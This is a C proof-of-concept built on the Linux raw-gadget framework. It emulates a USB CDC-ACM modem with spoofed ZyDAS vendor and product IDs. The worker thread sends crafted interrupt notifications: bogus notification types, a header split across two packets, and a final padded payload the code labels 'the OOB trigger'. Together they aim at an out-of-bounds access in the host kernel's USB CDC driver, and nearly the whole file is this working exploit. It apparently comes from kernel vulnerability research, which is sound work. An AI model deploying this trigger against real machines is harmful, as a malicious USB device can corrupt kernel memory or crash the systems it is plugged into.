// roughly based off https://github.com/xairy/raw-gadget/blob/master/examples/keyboard.c
// NOTE: this is playing fast-and-loose with endianness, it'll break on big-endian systems.

#include <pthread.h>
#include <err.h>
#include <stddef.h>
#include <signal.h>
#include <stdbool.h>
#include <assert.h>
#include <alloca.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/usb/cdc.h>
#include <linux/usb/raw_gadget.h>
#include <linux/mii.h>
#include <linux/mdio.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int usb_fd;

struct usb_raw_control_event {
  struct usb_raw_event inner;
  struct usb_ctrlrequest ctrl;
};

static struct usb_device_descriptor usb_device = {
  .bLength = USB_DT_DEVICE_SIZE,
  .bDescriptorType = USB_DT_DEVICE,
  .bcdUSB = __constant_cpu_to_le16(0x0200), /* USB 2.0 */
  .bDeviceClass = __constant_cpu_to_le16(USB_CLASS_COMM), // is this even used?
  .bMaxPacketSize0 = 64, /* maximum value the kernel lets us use */

  /* ZyDAS 56K USB MODEM */
  .idVendor = __constant_cpu_to_le16(0x0ace),
  .idProduct = __constant_cpu_to_le16(0x1608),

  .iManufacturer = 1,
  .iProduct = 2,
  .iSerialNumber = 3,

  .bNumConfigurations = 1
};

struct usb_config_descriptor usb_config = {
  .bLength = USB_DT_CONFIG_SIZE,
  .bDescriptorType = USB_DT_CONFIG,
  .wTotalLength = 0, // fixed up later
  .bNumInterfaces = 1,
  .bConfigurationValue = 1,
  .iConfiguration = 4,
  .bmAttributes =
    USB_CONFIG_ATT_ONE |// must be set
    USB_CONFIG_ATT_SELFPOWER,
  .bMaxPower = 0 // no power draw from host
};
struct usb_interface_descriptor usb_interface = {
  .bLength = USB_DT_INTERFACE_SIZE,
  .bDescriptorType = USB_DT_INTERFACE,
  .bInterfaceNumber = 0,
  .bAlternateSetting = 0,
  .bNumEndpoints = 3,
  .bInterfaceClass = USB_CLASS_COMM, // ?
  .bInterfaceSubClass = USB_CDC_SUBCLASS_ACM,
  .bInterfaceProtocol = USB_CDC_PROTO_NONE,
  .iInterface = 5,
};
unsigned char cdc_dummy_header[] = { /*len*/0x3, USB_DT_CS_INTERFACE, 0xf0 };
struct usb_endpoint_descriptor usb_endpoint_in = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_IN | 1,
  .bmAttributes = USB_ENDPOINT_XFER_BULK,
  .wMaxPacketSize = 64,
};
struct usb_endpoint_descriptor usb_endpoint_out = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_OUT | 1,
  .bmAttributes = USB_ENDPOINT_XFER_BULK,
  .wMaxPacketSize = 64,
};
struct usb_endpoint_descriptor usb_endpoint_intr = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_IN | 2,
  .bmAttributes = USB_ENDPOINT_XFER_INT,
  .wMaxPacketSize = 64,
  .bInterval = 1
};
unsigned short intr_handle, in_handle, out_handle;

void usb_reply(void *data, size_t len, size_t req_length) {
  printf("         REPLY: size %lu, req_length %lu\n", (unsigned long)len, (unsigned long)req_length);
  if (len > req_length)
    len = req_length;
  struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+len);
  io->ep = 0;
  io->flags = 0;
  io->length = len;
  memcpy(io->data, data, len);
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_WRITE, io));
}

void usb_get_and_ack(void *buf, size_t len, size_t req_length) {
  printf("         ACK OUT: req_length %lu\n", (unsigned long)req_length);
  struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+req_length);
  memset(io, 0xee, sizeof(struct usb_raw_ep_io)+req_length);
  io->ep = 0;
  io->flags = 0;
  io->length = req_length;
  //printf("issuing USB_RAW_IOCTL_EP0_READ with io->length=%u\n", io->length);
  int ret_len = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_READ, io));
  assert(ret_len == req_length);
  if (buf) {
    if (len > req_length) {
      memset(buf, '\0', len);
      len = req_length;
    }
    memcpy(buf, ((char*)io)+sizeof(struct usb_raw_ep_io), len);
  }
}
void usb_ack(size_t req_length) {
  usb_get_and_ack(NULL, 0, req_length);
}

void descr_append(void *buf, size_t *buf_len, void *descr, size_t descr_len) {
  printf("           descr_append(buf, len, descr, descr_len=%lu with first byte %hhu\n", (unsigned long)descr_len, *(unsigned char *)descr);
  assert(descr_len <= 255);
  assert(descr_len >= 2);
  assert(((unsigned char*)descr)[0] == descr_len);
  memcpy(buf + *buf_len, descr, descr_len);
  (*buf_len) += descr_len;
  ((struct usb_config_descriptor*)buf)->wTotalLength = __cpu_to_le16(*buf_len);
}

void send_intr(void *data, size_t len) {
  static pthread_mutex_t bulk_mutex = PTHREAD_MUTEX_INITIALIZER;

  pthread_mutex_lock(&bulk_mutex);
  bool last;
  size_t off = 0;
  do {
    last = ((len-off) <= 512);
    size_t frag_len = last ? (len-off) : 512;
    struct {
      struct usb_raw_ep_io inner;
      char data[512];
    } io = {
      .inner = {
        .ep = intr_handle,
        .flags = last ? USB_RAW_IO_FLAGS_ZERO : 0,
        .length = frag_len,
      },
    };
    memcpy(io.data, data+off, frag_len);
    SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_WRITE, &io));
    off += frag_len;
  } while (!last);
  pthread_mutex_unlock(&bulk_mutex);
}

int state = 0;

void handle_alarm(int sig) {
  if (state == 0) {
    state = 1;
  } else if (state == 2 || state == 4) {
    state = 3;
  }
}

static void *thread_fn(void *dummy) {
  sleep(1);
  printf("sending A packets\n");
  struct usb_cdc_notification packet_a1 = {
    .bmRequestType = 0,
    .bNotificationType = 0xff/*bogus type, become ignored*/,
    .wValue = 0,
    .wIndex = 0,
    .wLength = 0x30
  };
  send_intr(&packet_a1, sizeof(packet_a1));
  char packet_a2[0x30] = {};
  send_intr(packet_a2, sizeof(packet_a2));

  printf("sending B packets\n");
  // this struct is split into packets B.1 and B.2
  struct {
    struct usb_cdc_notification hdr;
    char data[0x2f];
  } packet_b12 = {
    .hdr = {
      .bmRequestType = 0,
      .bNotificationType = 0xff/*bogus type, become ignored*/,
      .wValue = 0,
      .wIndex = 0,
      .wLength = 0x2e
    }
  };
  size_t split = offsetof(struct usb_cdc_notification, wLength);

  // send packet B.1
  send_intr(&packet_b12, split);
  // send packet B.2
  send_intr(((char*)&packet_b12)+split, sizeof(packet_b12)-split);
  // send packet B.3 - the OOB trigger
  char oob_data[0x2d];
  memset(oob_data, 'A', sizeof(oob_data));
  send_intr(oob_data, sizeof(oob_data));

  return NULL;
}

int main(void) {
  usb_fd = SYSCHK(open("/dev/raw-gadget", O_RDWR));

  struct usb_raw_init init_args = {
    .driver_name = "dummy_udc",
    .device_name = "dummy_udc.0",
    .speed = /*USB_SPEED_HIGH*/USB_SPEED_FULL
  };
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_INIT, &init_args));
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_RUN, 0));

  struct sigaction alarm_act = {
    .sa_handler = handle_alarm,
    .sa_flags = 0
  };
  if (sigaction(SIGALRM, &alarm_act, NULL))
    err(1, "sigaction");
  //alarm(5);

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  while (1) {
    struct usb_raw_control_event control_ev = {
      .inner = { .type = 0, .length = sizeof(control_ev.ctrl) }
    };
    int res = ioctl(usb_fd, USB_RAW_IOCTL_EVENT_FETCH, &control_ev);
    if (res == -1) {
      if (errno == EINTR)
        continue;
      err(1, "USB_RAW_IOCTL_EVENT_FETCH");
    }
    if (control_ev.inner.type == USB_RAW_EVENT_CONNECT) {
      printf("got connect:\n");
      struct usb_raw_eps_info eps_info;
      int eps_count = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EPS_INFO, &eps_info));
      printf("  device controller's available non-control endpoints:\n");
      for (int i=0; i<eps_count; i++) {
        struct usb_raw_ep_info *ep = &eps_info.eps[i];
        printf("    ep[%d]: name='%s' addr=%u iso=%d bulk=%d int=%d in=%d out=%d maxpacket_limit=%u max_streams=%u\n",
               i, ep->name, ep->addr,
               ep->caps.type_iso, ep->caps.type_bulk, ep->caps.type_int, ep->caps.dir_in, ep->caps.dir_out,
               ep->limits.maxpacket_limit, ep->limits.max_streams);
      }
    } else if (control_ev.inner.type == USB_RAW_EVENT_CONTROL) {
      unsigned req_length = __le16_to_cpu(control_ev.ctrl.wLength);
      bool is_dir_in = (control_ev.ctrl.bRequestType & USB_DIR_IN) != 0;
      printf("got control (in=%d, wLength=%u):\n", is_dir_in, req_length);
      switch (control_ev.ctrl.bRequestType & USB_TYPE_MASK) {
        case USB_TYPE_STANDARD:
          switch(control_ev.ctrl.bRequest) {
            case USB_REQ_GET_DESCRIPTOR: {
              unsigned descriptor_type = control_ev.ctrl.wValue >> 8;
              switch (descriptor_type) {
                case USB_DT_DEVICE:
                  printf("  getting device descriptor\n");
                  usb_reply(&usb_device, sizeof(usb_device), req_length);
                  break;
                case USB_DT_CONFIG: {
                  printf("  getting dt config\n");
                  char dt_config[1024*128];
                  size_t dt_config_len = 0;
                  descr_append(dt_config, &dt_config_len, &usb_config, sizeof(usb_config));
                  descr_append(dt_config, &dt_config_len, &usb_interface, sizeof(usb_interface));
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_in, USB_DT_ENDPOINT_SIZE);
                  descr_append(dt_config, &dt_config_len, cdc_dummy_header, sizeof(cdc_dummy_header));
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_out, USB_DT_ENDPOINT_SIZE);
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_intr, USB_DT_ENDPOINT_SIZE);
                  usb_reply(dt_config, dt_config_len, req_length);
                } break;
                case USB_DT_STRING: {
                  unsigned string_id = control_ev.ctrl.wValue & 0xff;
                  printf("  getting string %d\n", string_id);
                  if (string_id == 0) {
                    unsigned char string_descr[] = {
                      4/*length*/, USB_DT_STRING,
                      0x09, 0x04 /* English - United States */
                    };
                    usb_reply(string_descr, sizeof(string_descr), req_length);
                  } else {
                    unsigned char string_descr[] = {
                      12/*length*/, USB_DT_STRING,
                      'D',0,'U',0,'M',0,'M',0,'Y',0
                    };
                    usb_reply(string_descr, sizeof(string_descr), req_length);
                  }
                } break;
                case USB_DT_DEVICE_QUALIFIER: {
                  struct usb_qualifier_descriptor qual = {
                    .bLength = sizeof(qual),
                    .bDescriptorType = USB_DT_DEVICE_QUALIFIER,
                    .bcdUSB = 0x200,
                    .bMaxPacketSize0 = 64,
                    .bNumConfigurations = 1
                  };
                  usb_reply(&qual, sizeof(qual), req_length);
                } break;
                default:
                  errx(1, "USB_REQ_GET_DESCRIPTOR: descriptor_type=%x", descriptor_type);
              }
            } break;
            case USB_REQ_SET_CONFIGURATION: {
              printf("  set configuration\n");
              in_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_in));
              out_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_out));
              intr_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_intr));
              SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_CONFIGURE, 0));
              usb_ack(req_length);
            } break;
            case USB_REQ_SET_INTERFACE: {
              printf("  set interface\n");
              usb_ack(req_length);
            } break;
            default:
              errx(1, "unknown standard ctrlrequest 0x%x", (unsigned)control_ev.ctrl.bRequest);
          }
          break;
        case USB_TYPE_CLASS:
          switch (control_ev.ctrl.bRequest) {
            default:
              if (is_dir_in) {
                errx(1, "unknown class ctrlrequest 0x%02hhx", control_ev.ctrl.bRequest);
              } else {
                printf("    ignoring unknown class ctrlrequest 0x%02hx\n", control_ev.ctrl.bRequest);
                usb_ack(req_length);
              }
          }
          break;
        case USB_TYPE_VENDOR:
          switch (control_ev.ctrl.bRequest) {
            default:
              if (is_dir_in) {
                errx(1, "unknown vendor ctrlrequest 0x%02hhx", control_ev.ctrl.bRequest);
              } else {
                printf("    ignoring unknown vendor ctrlrequest 0x%02hx\n", control_ev.ctrl.bRequest);
                usb_ack(req_length);
              }
          }
          break;
        default:
          errx(1, "USB_TYPE_* unknown");
      }
    } else {
      printf("unknown event, type 0x%x\n", (unsigned)control_ev.inner.type);
    }
  }
}
